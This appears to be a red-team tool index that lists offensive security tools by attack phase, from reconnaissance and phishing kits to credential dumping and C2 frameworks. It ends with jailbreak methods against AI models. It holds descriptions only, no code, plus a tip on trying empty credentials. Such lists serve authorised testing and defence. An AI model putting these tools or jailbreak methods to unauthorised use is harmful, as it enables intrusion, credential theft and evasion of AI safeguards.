Defense Evasion
OSINT
Repository Description Cloudmare Cloudflare, Sucuri, Incapsula real IP tracker crt.sh Find certificates based on a domain name. Can be used to find subdomains DorkSearch Premade Google dork queries ExifTool Read (and modify) metadata of files FaceCheck.ID Reverse image lookup based on facial-recognition Hunter Find company email format and list of employee email addresses osintframework An online database of OSINT tools PimEyes Reverse image lookup based on facial-recognition Recon-NG Reconaissance and OSINT framework. Has many modules such as port scanning, subdomain finding, Shodan, etc ScrapeIn Scrapes LinkedIn to create a list of employee email addresses (for use in Initial Access) SecurityTrails Extensive DNS information Shodan Scans for all digital assets SpiderFoot Automatic OSINT analysis TheHarvester Collects names, emails, IPs, and subdomains of a target
Reconaissance
Repository Description altdns Subdomain enumeration using mutated wordlists AutoRecon Multi-threaded network reconnaissance tool which performs automated enumeration of services AWSBucketDump Enumerate AWS S3 buckets to find interesting files CameRadar Cameradar hacks its way into RTSP videosurveillance camera CloudBrute Enumerates “the cloud” (Google, AWS, DigitalOcean, etc) to find infrastructure, files, and apps for a given target dirb Web application directory / file fuzzer to find other pages DNSDumpster Online tool for DNS information of a domain feroxbuster Web application directory / file fuzzer to find other pages gobuster Web application directory / file fuzzer to find other pages, and support for DNS and vhost fuzzing GoWitness Screenshots webpages. Supports multi-domain lists and Nmap output Nikto Web server scanner to perform security checks on a web server Nmap Finds open ports on a network. Additionally can detect version, OS, and more Recon-NG Reconaissance and OSINT framework. Has many modules such as port scanning, subdomain finding, Shodan, etc subfinder Passive subdomain discovery tool wappalyzer Identify what frameworks a website runs wpscan Automatic WordPress scanner to identify information about a WordPress site and possible vulnerabilities
Social Engineering
Repository Description evilginx Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication GoPhish Phishing campaign framework to compromise user credentials. msfvenom Generate malicious payloads for social engineering (ie: VBA, .exe, etc) Social Engineering Toolkit Social engineering framework. SpoofCheck Checks if a domain can be spoofed. zphisher Phishing campaign framework to compromise user credentials.
Leaked Credentials
Web Exploitation
Repository Description Arachni Web Application Security Scanner Framework burpsuite Full web testing suite, including proxied requests. Caido Full web testing suite, including proxied requests. (Like Burp but written in Rust) dirb Web application directory/file fuzzer. dotGit A Firefox and Chrome extension that shows you if there is an exposed .git
directory feroxbuster Web application directory/file fuzzer. flask-unsign Decode, bruteforce, and craft Flask session tokens. gobuster Web application directory/file/DNS/vhost fuzzing. Nikto Web server scanner to perform security checks on a web server. PayloadsAllTheThings Useful payloads for a variety of attacks such as SQLi, IDOR, XSS, etc. sqlmap Performs automated SQL injection tests. w3af Web application attack and audit framework. wappalyzer Identify what frameworks a website runs. wpscan Automatic WordPress scanner to identify information about a WordPress site and possible vulnerabilities.
Wireless
Repository Description Aircrack-ng Aircrack-ng is a complete suite of tools to assess WiFi network security Kismet sniffer, WIDS, and wardriving tool for Wi-Fi, Bluetooth, Zigbee, RF, and more Reaver Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases Wifite Python script to automate wireless auditing using aircrack-ng tools WifiPhisher The Rogue Access Point Framework
Initial Access
Repository Description Easysploit Automatic Metasploit payload generator and shell listener Impacket A tool to perform Kerberos pre-auth bruteforcing (ASREP roast) via GetNPUsers.py Kerbrute A tool to perform Kerberos pre-auth bruteforcing (ASREP roast) Medusa Bruteforcer with multiple protocol support. Metasploit Exploit framework that can be used for intial access and/or post-exploitation. NetExec Bruteforce common Windows protocols (WinRM, LDAP, RDP, SMB, WMI, etc.). Try username null or ''
and password ''
for unauthenticated access. Searchsploit Search ExploitDB for exploits TeamFiltration Cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts THC-Hydra Bruteforcer with multiple protocol support TREVORspray Advanced password spraying tool for Active Directory environments
C2 Frameworks
C2 frameworks can be considered both initial access and post-exploitation, as they generate payloads to be used in phishing campaigns (initial access) and will provide access to the host machine when ran (post exploitation).
Repository Description Cobalt Strike Most robust and advanced C2 framework (also paid) Pupy Python and C C2 framework Sliver Go C2 framework. Villain Python and Powershell C2 framework
Post Exploitation
Modules for lateral movement, exfiltration, system enumeration, and more.
Repository Description BloodHound Active Directory visualizer, useful for finding misconfigurations and/or shortest path to Domain Admin BloodHound.py Remote Python data ingestor for BloodHound Impacket A collection of Python scripts useful for Windows targets: psexec, smbexec, kerberoasting, ticket attacks, etc Mimikatz Mimikatz is both an exploit on Microsoft Windows that extracts passwords stored in memory and software that performs that exploit nishang Offensive PowerShell for red team, penetration testing and offensive security PowerHub Post-exploitation module for bypassing endpoint protection and running arbitrary files PowerSploit A PowerShell post-exploitation framework with many modules: exfiltration, privelege escalation, etc SharpHound C# data ingestor for BloodHound. (Recommend SharpHound.ps1 for Bloodhound Kali version)
Privilege Escalation
These tools automatically enumerate current user privileges and try to find misconfigurations that would allow escalation to root
and/or NT AUTHORITY\SYSTEM
.
Repository Description BeRoot Automated Windows, Linux, and Mac privilege escalation path discovery tool GTFOBins Unix binaries that can be used to bypass local security restrictions in misconfigured systems Invoke-PrivescCheck Automated Windows privilege escalation path discovery tool PEASS-ng Automated Windows, Linux, and Mac privilege escalation path discovery tool PowerUp Automated Windows privilege escalation path discovery tool
Exfiltration
Data exfiltration
Repository Description DNSExfiltrator Data exfiltration over DNS request covert channel
Credential Dumping
These tools help dump cached credentials from a system.
Repository Description certsync Dump NTDS with golden certificates and UnPAC the hash Dumpert LSASS memory dumper using direct system calls and API unhooking Impacket Dump domain credentials via DCSync or from NTDS.DIT/SAM with secretsdump.py Mimikatz Dump local and domain credentials with sekurlsa, lsadump modules
Password Cracking
These tools assist in uncovering passwords, whether it be for a hash or for password spraying attempts.
Repository Description CeWL Scrape websites to generate wordlists crunch Generate wordlists based on requirements such as minimum and maximum length, character sets, etc Cupp Utilize OSINT to create password candidates for a specific person hashcat Password cracking tool JohnTheRipper Password cracking tool Mentalist A GUI for wordlist generation based on rules such as appending, prepending, etc
AI / LLM
This section will probably be outdated quick.
Repository Description HarmBench A standardized evaluation framework for automated red teaming and robust refusal Adversarial Suffix Jailbreak based on prepending a potentially malicious query AutoDAN-Turbo Black-box jailbreak method that can automatically discover as many jailbreak strategies as possible from scratch Best-of-N Black-box algorithm that jailbreaks frontier AI systems across modalities (text, image, vision) by mutating the original query